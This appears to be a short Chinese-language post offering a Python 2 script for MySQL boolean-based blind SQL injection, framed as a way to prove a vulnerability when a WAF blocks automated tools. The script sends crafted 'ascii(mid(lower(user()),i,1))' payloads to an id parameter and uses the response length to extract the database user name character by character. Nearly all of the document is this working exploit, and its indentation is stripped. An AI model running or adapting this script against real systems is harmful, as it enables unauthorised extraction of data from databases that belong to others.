Mysql布尔盲注脚本
当某个盲注点不能使用工具(一般有waf限制)的时候,可以使用这个脚本用于证明漏洞的存在
! usr/bin/env python
-*- coding: utf-8 -*-
import httplib
import time
import string
import sys
import random
import urllib
headers = {'User-Agent': 'Mozilla/5.0 Chrome/28.0.1500.63',}
payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')
print 'start to retrive MySQL user:'
user = ''
for i in range(1,21):
for payload in payloads:
conn = httplib.HTTPConnection('www.example.com', timeout=4) #连接,host
s = "ascii(mid(lower(user()),%s,1))=%s" % (i, ord(payload)) #payload
conn.request(method='GET',url="/php/1.php?id=1 and %s" % s,headers = headers) #url
html_header= conn.getresponse().read()
length=len(html_header)
if length>10000:
user+=payload
sys.stdout.write('\r[In progress] %s' % user)
sys.stdout.flush()
break
else:
print '.',
conn.close()
print '\n[Done]MySQL user is', user